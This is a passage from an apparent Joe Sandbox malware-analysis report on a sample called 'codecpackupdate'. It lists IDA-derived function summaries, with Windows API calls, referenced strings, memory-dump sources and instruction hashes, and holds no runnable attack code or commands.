                                                                          • CloseHandle.KERNEL32(?), ref: 009F1CBA
                                                                          • InterlockedExchangeAdd.KERNEL32(00A27244,00000000), ref: 009F1CC6
                                                                          • TerminateThread.KERNEL32(?,00000000), ref: 009F1CD4
                                                                          • QueueUserAPC.KERNEL32(009F1E7C,?,00000000), ref: 009F1CE1
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009F1CEC
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                          • String ID:
                                                                          • API String ID: 1946104331-0
                                                                          • Opcode ID: 17ab6e982b01fb5fc7d339ac65c5f144fdbb0ab0d82a409c6d75b317ae9c3596
                                                                          • Instruction ID: 44b94592436334ef4f3a1fcc73bf9929e8f45e106a5505623e9990e73a904077
                                                                          • Opcode Fuzzy Hash: 17ab6e982b01fb5fc7d339ac65c5f144fdbb0ab0d82a409c6d75b317ae9c3596
                                                                          • Instruction Fuzzy Hash: 87F03135144314FFD7109B95DD0DDABBBBCEB89721B00825DF669821A0DB7059018B60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetVersionExA.KERNEL32 ref: 00403131
                                                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                          • API String ID: 1385375860-4131005785
                                                                          • Opcode ID: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                          • Instruction ID: 15aa791d7551e4111e6245bb3a1b8270ecaa7052e860947edacf4d8c3684a0cc
                                                                          • Opcode Fuzzy Hash: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                          • Instruction Fuzzy Hash: 9C3102719412486DEB31AB706C45BDA7F6C9B0A709F2404FFD145FA2C2D6398F898B19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • std::exception::exception.LIBCMT ref: 00A018BF
                                                                            • Part of subcall function 00A02413: std::exception::_Copy_str.LIBCMT ref: 00A0242C
                                                                            • Part of subcall function 00A00C90: __CxxThrowException@8.LIBCMT ref: 00A00CEE
                                                                          • std::exception::exception.LIBCMT ref: 00A0191E
                                                                          Strings
                                                                          • $, xrefs: 00A01923
                                                                          • boost unique_lock owns already the mutex, xrefs: 00A0190D
                                                                          • boost unique_lock has no mutex, xrefs: 00A018AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                          • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                          • API String ID: 2140441600-46888669
                                                                          • Opcode ID: f2d2bd60a6c7d8c02dcf324df17f3e2647ab27bc79293e4f607119ce624d0a6c
                                                                          • Instruction ID: 6b48039f3f615d647ba4c37b9347692bf0a51671951f8ece9791f3183d716c24
                                                                          • Opcode Fuzzy Hash: f2d2bd60a6c7d8c02dcf324df17f3e2647ab27bc79293e4f607119ce624d0a6c
                                                                          • Instruction Fuzzy Hash: DA2128B15083849FD720DF24D549B9BBBE4BB88708F004E2DF4A587281D7BA9548CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F2350
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F2360
                                                                          • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F2370
                                                                          • GetLastError.KERNEL32 ref: 009F237A
                                                                            • Part of subcall function 009F1712: __EH_prolog.LIBCMT ref: 009F1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID: pqcs
                                                                          • API String ID: 1619523792-2559862021
                                                                          • Opcode ID: 91fc3320247497578c3717657b3b5a00e985e8785538cf479eb4d6bfac44c4de
                                                                          • Instruction ID: cfb13f5dbd00a0f47b4b6f220637bb2ed40155d6a838e6f493767cdbd2d60d5a
                                                                          • Opcode Fuzzy Hash: 91fc3320247497578c3717657b3b5a00e985e8785538cf479eb4d6bfac44c4de
                                                                          • Instruction Fuzzy Hash: 19F03AB0A04308ABDB20EFB49D09BBF7BBDEB44701F008169F90AD3150EAB09D058791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F4035
                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 009F4042
                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 009F4049
                                                                          • std::exception::exception.LIBCMT ref: 009F4063
                                                                            • Part of subcall function 009FA5FD: __EH_prolog.LIBCMT ref: 009FA602
                                                                            • Part of subcall function 009FA5FD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009FA611
                                                                            • Part of subcall function 009FA5FD: __CxxThrowException@8.LIBCMT ref: 009FA630
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 3112922283-2104205924
                                                                          • Opcode ID: 863b080c862d37beea50fa134a93033976df33c1c171026fdcc11b4e5928d803
                                                                          • Instruction ID: 4362b39bf8ccee3b4ecb65b41bba0a46daec24f57865962b689188c131fd9ab5
                                                                          • Opcode Fuzzy Hash: 863b080c862d37beea50fa134a93033976df33c1c171026fdcc11b4e5928d803
                                                                          • Instruction Fuzzy Hash: 1DF08CB1D0830DEBCB00EFE0D909BEEBB78EB08304F404158FA25A6281DB7942458B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 0040489B
                                                                          • GetFileType.KERNEL32(00000800), ref: 00404941
                                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
                                                                          • GetFileType.KERNEL32(00000000), ref: 004049A8
                                                                          • SetHandleCount.KERNEL32 ref: 004049DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType$CountInfoStartup
                                                                          • String ID:
                                                                          • API String ID: 1710529072-0
                                                                          • Opcode ID: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                          • Instruction ID: 5bba43567eb9c7eebad7166e054eef6f33a3e935d61c9f19950f113686a4cc82
                                                                          • Opcode Fuzzy Hash: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                          • Instruction Fuzzy Hash: 585124F25003118BD7208B38CD48B673BA0EB91331F19873AE696BB2E1D738C855875A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00A01990: CloseHandle.KERNEL32(00000000,35B6412D), ref: 00A019E1
                                                                            • Part of subcall function 00A01990: WaitForSingleObject.KERNEL32(?,000000FF,35B6412D,?,?,?,?,35B6412D,00A01963,35B6412D), ref: 00A019F8
                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00A01C5E
                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00A01C7E
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00A01CB7
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00A01D0B
                                                                          • SetEvent.KERNEL32(?), ref: 00A01D12
                                                                            • Part of subcall function 009F418C: CloseHandle.KERNEL32(00000000,?,00A01C45), ref: 009F41B0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                          • String ID:
                                                                          • API String ID: 4166353394-0
                                                                          • Opcode ID: bc68909d21fafb026e683a578135e3f06210f19e6d558b8f2cad965ac706c189
                                                                          • Instruction ID: 568b5ccf27273b64136b022e46aa2e1822beb37c9099463e159bcbe4ec53e939
                                                                          • Opcode Fuzzy Hash: bc68909d21fafb026e683a578135e3f06210f19e6d558b8f2cad965ac706c189
                                                                          • Instruction Fuzzy Hash: 8841E1706403059FEB25CF28EC80BAB77A4EF45320F244668EC18DB2D5D735DC028BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F20AC
                                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009F20CD
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F20D8
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 009F213E
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F21A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                          • String ID:
                                                                          • API String ID: 1611172436-0
                                                                          • Opcode ID: e6f397aa27f392c60730c4a4f8b466548b9a380069366d61824c25a0581f55cf
                                                                          • Instruction ID: 67d14c28b2ac81980e7d11e64a4db10a25bcfb16097dd3b502d7e6fe8ef501ba
                                                                          • Opcode Fuzzy Hash: e6f397aa27f392c60730c4a4f8b466548b9a380069366d61824c25a0581f55cf
                                                                          • Instruction Fuzzy Hash: 36319A72208705AFC310DF65C885A6BBBF9FFD8710B144A1EF59683250DB30E906CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FE030
                                                                            • Part of subcall function 009F1A01: TlsGetValue.KERNEL32 ref: 009F1A0A
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009FE0AF
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009FE0CB
                                                                          • InterlockedIncrement.KERNEL32(00A25180), ref: 009FE0F0
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009FE105
                                                                            • Part of subcall function 009F27F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 009F284E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                          • String ID:
                                                                          • API String ID: 1578506061-0
                                                                          • Opcode ID: 35dd7a528a6f70003d2bab75684a9d91c09abd69916526ffd67de1445844753a
                                                                          • Instruction ID: 73882ef7c487be1c39c31a996efcbb55400adf5f66bc65814bb28f3d9a070183
                                                                          • Opcode Fuzzy Hash: 35dd7a528a6f70003d2bab75684a9d91c09abd69916526ffd67de1445844753a
                                                                          • Instruction Fuzzy Hash: 143137B1905308DFCB20DFA9D944AAEBBF8FF48310F14855EE949D7641E775AA04CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 00A102F0
                                                                            • Part of subcall function 00A02EEC: __FF_MSGBANNER.LIBCMT ref: 00A02F03
                                                                            • Part of subcall function 00A02EEC: __NMSG_WRITE.LIBCMT ref: 00A02F0A
                                                                            • Part of subcall function 00A02EEC: RtlAllocateHeap.NTDLL(008F0000,00000000,00000001), ref: 00A02F2F
                                                                          • _free.LIBCMT ref: 00A10303
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free_malloc
                                                                          • String ID:
                                                                          • API String ID: 1020059152-0
                                                                          • Opcode ID: 9ac9ea5b509969901f50f362d1a581b2f37d3ca4f12bea9eea21b9228626811a
                                                                          • Instruction ID: 07ef0fd0f54d79b6cbb347d960e81d228b918bc1c898eaf51b986662e257eb7f
                                                                          • Opcode Fuzzy Hash: 9ac9ea5b509969901f50f362d1a581b2f37d3ca4f12bea9eea21b9228626811a
                                                                          • Instruction Fuzzy Hash: C4110A32904719ABDB217FB4BD0DFDB3B989F14360B114526F969CE1E0EAB488C18690
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F21DA
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F21ED
                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 009F2224
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 009F2237
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009F2261
                                                                            • Part of subcall function 009F2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009F2350
                                                                            • Part of subcall function 009F2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009F2360
                                                                            • Part of subcall function 009F2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F2370
                                                                            • Part of subcall function 009F2341: GetLastError.KERNEL32 ref: 009F237A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1856819132-0
                                                                          • Opcode ID: 6a5518508cbb8a1f7b1b5c4dfdef119ed416befb74571b18163acf3ee067a083
                                                                          • Instruction ID: f14af3a1252b45b1d0750124d77c4933c479ab7e5f137c2fa5920beacde5f230
                                                                          • Opcode Fuzzy Hash: 6a5518508cbb8a1f7b1b5c4dfdef119ed416befb74571b18163acf3ee067a083
                                                                          • Instruction Fuzzy Hash: 52117F72D08218DBCB15EFA8DC04AFEBBB9FF48310F10412AF92592261D7754A42DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F229D
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F22B0
                                                                          • TlsGetValue.KERNEL32 ref: 009F22E7
                                                                          • TlsSetValue.KERNEL32(?), ref: 009F2300
                                                                          • TlsSetValue.KERNEL32(?,?,?), ref: 009F231C
                                                                            • Part of subcall function 009F2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009F2350
                                                                            • Part of subcall function 009F2341: InterlockedExchange.KERNEL32(?,00000001), ref: 009F2360
                                                                            • Part of subcall function 009F2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F2370
                                                                            • Part of subcall function 009F2341: GetLastError.KERNEL32 ref: 009F237A
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 1856819132-0
                                                                          • Opcode ID: d5446eeebf9dd5180c081f664089ad1f500370416bebc607c971ad2846a42715
                                                                          • Instruction ID: e72e8bfa46c7909a1476c7fd3cde2bbb5f896cf41f6986a8116cf8ac3f1d6e9b
                                                                          • Opcode Fuzzy Hash: d5446eeebf9dd5180c081f664089ad1f500370416bebc607c971ad2846a42715
                                                                          • Instruction Fuzzy Hash: F5115EB2D04218EBCB11EFA4DC05AFEBBB9EF48750F00412AF804A3260D7754A52DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 009FB098: __EH_prolog.LIBCMT ref: 009FB09D
                                                                          • __CxxThrowException@8.LIBCMT ref: 009FBC62
                                                                            • Part of subcall function 00A0449A: RaiseException.KERNEL32(?,?,009FFA92,?,?,?,?,?,?,?,009FFA92,?,00A20F78,?), ref: 00A044EF
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00A21D94,?,00000001), ref: 009FBC78
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009FBC8B
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,00A21D94,?,00000001), ref: 009FBC9B
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009FBCA9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                          • String ID:
                                                                          • API String ID: 2725315915-0
                                                                          • Opcode ID: e74c0568085ee43b753e97000f8131e162d323a14972e5ae635971840ae53489
                                                                          • Instruction ID: f19be68c04e30a6a8da5d9c728cfaad2879bb7c26eaf3f32bd136bcadf9b718b
                                                                          • Opcode Fuzzy Hash: e74c0568085ee43b753e97000f8131e162d323a14972e5ae635971840ae53489
                                                                          • Instruction Fuzzy Hash: D2016DB6604308AFDB10DFE4DD89F9B77ADEB08766B048514F665D6290DB60E8059720
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009F2432
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009F2445
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F2454
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F2469
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F2470
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 747265849-0
                                                                          • Opcode ID: 9c80e352f30340290c9f6b85e87e456b5b1f601711cedbd6aa6ca49cb9fb1fbe
                                                                          • Instruction ID: 92d4446130df1443ac07c2aaf58899690347d278af1d4a43fa44d0653d2eb8d7
                                                                          • Opcode Fuzzy Hash: 9c80e352f30340290c9f6b85e87e456b5b1f601711cedbd6aa6ca49cb9fb1fbe
                                                                          • Instruction Fuzzy Hash: 7BF01772204214BBD710EBE0ED89FEAB72DFB49711F809025F701D6491D7A1A922CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(?), ref: 009F1ED2
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 009F1EEA
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F1EF9
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F1F0E
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F1F15
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 830998967-0
                                                                          • Opcode ID: 09779e761dc5526172984337db69a00b280e00f0075c4898c69bfdec6b290ea6
                                                                          • Instruction ID: 0f40a5dcd0a0dcbfafd1cd338f6e939dc22c42da48e4fa3692aea25f5247630d
                                                                          • Opcode Fuzzy Hash: 09779e761dc5526172984337db69a00b280e00f0075c4898c69bfdec6b290ea6
                                                                          • Instruction Fuzzy Hash: 45F01772205605BBD700EFA1ED88FDABB3DFF58351F005016F60196451DB61AA268BE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 009F9A0C: __EH_prolog.LIBCMT ref: 009F9A11
                                                                            • Part of subcall function 009F9A0C: _Allocate.LIBCPMT ref: 009F9A68
                                                                            • Part of subcall function 009F9A0C: _memmove.LIBCMT ref: 009F9ABF
                                                                          • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 00A008E2
                                                                          • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 00A008EA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateErrorFormatH_prologLastMessage_memmove
                                                                          • String ID: Unknown error$invalid string position
                                                                          • API String ID: 1017912131-1837348584
                                                                          • Opcode ID: cd625b08bfda2b3d90d19e2cbeb51ed3c449ba4e8a4a14fc1cf086040725435e
                                                                          • Instruction ID: bf659197332dec50caf3d59dec5e8209dba17022c292d00dd7dec614cac3dace
                                                                          • Opcode Fuzzy Hash: cd625b08bfda2b3d90d19e2cbeb51ed3c449ba4e8a4a14fc1cf086040725435e
                                                                          • Instruction Fuzzy Hash: 2F51BA702083459FEB14CF24D890F2FBBE4BB98384F50092EF481976D2D771E5898B92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: invalid string position$string too long
                                                                          • API String ID: 4104443479-4289949731
                                                                          • Opcode ID: f4f2029c5868a4d92ed49e601de36cc680286bd7d337394bc07fb70e70c2a6a5
                                                                          • Instruction ID: cb026525c23714403e9f59b849f7e8e5494f81fa3b4a28288b47f18ab4468e8a
                                                                          • Opcode Fuzzy Hash: f4f2029c5868a4d92ed49e601de36cc680286bd7d337394bc07fb70e70c2a6a5
                                                                          • Instruction Fuzzy Hash: 1F418331300309ABDB74AE69D895B77B7AEEF41714B24092DEA56CB381CB70E944CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000), ref: 009F30C3
                                                                          • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 009F3102
                                                                          • _memcmp.LIBCMT ref: 009F3141
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressErrorLastString_memcmp
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 1618111833-2422070025
                                                                          • Opcode ID: 43a1f9d25660d8a54e4b371ddbb383961b0cfb1167a804ebefb6e393167cb79f
                                                                          • Instruction ID: e21f21ed7971d7818bab5d4d9e18c8d4d61d0b8afb4c6610c0d3bd0f5ca04f61
                                                                          • Opcode Fuzzy Hash: 43a1f9d25660d8a54e4b371ddbb383961b0cfb1167a804ebefb6e393167cb79f
                                                                          • Instruction Fuzzy Hash: 2631D3B1B0430CDFDB20DF64C880BBEB7B9BF45321F108569E9699B280DB759A418B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F1F5B
                                                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 009F1FC5
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 009F1FD2
                                                                            • Part of subcall function 009F1712: __EH_prolog.LIBCMT ref: 009F1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                          • String ID: iocp
                                                                          • API String ID: 998023749-976528080
                                                                          • Opcode ID: 186de4a6d3ad93fb44641f4ce3e65ea28f08f258f3720d17aeb3d5b9aa9b6c0a
                                                                          • Instruction ID: 899751423531298394c19ffdbf0a299a3ec3fb73586e616e77e52d580231d75d
                                                                          • Opcode Fuzzy Hash: 186de4a6d3ad93fb44641f4ce3e65ea28f08f258f3720d17aeb3d5b9aa9b6c0a
                                                                          • Instruction Fuzzy Hash: 9A21EAB1801B44DFC720DF6AC50059AFBF8FF94710B108A1FE5A683A50D7B0A644CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 00A03AA7
                                                                            • Part of subcall function 00A02EEC: __FF_MSGBANNER.LIBCMT ref: 00A02F03
                                                                            • Part of subcall function 00A02EEC: __NMSG_WRITE.LIBCMT ref: 00A02F0A
                                                                            • Part of subcall function 00A02EEC: RtlAllocateHeap.NTDLL(008F0000,00000000,00000001), ref: 00A02F2F
                                                                          • std::exception::exception.LIBCMT ref: 00A03AC5
                                                                          • __CxxThrowException@8.LIBCMT ref: 00A03ADA
                                                                            • Part of subcall function 00A0449A: RaiseException.KERNEL32(?,?,009FFA92,?,?,?,?,?,?,?,009FFA92,?,00A20F78,?), ref: 00A044EF
                                                                          Strings
                                                                          Memory Dump Source
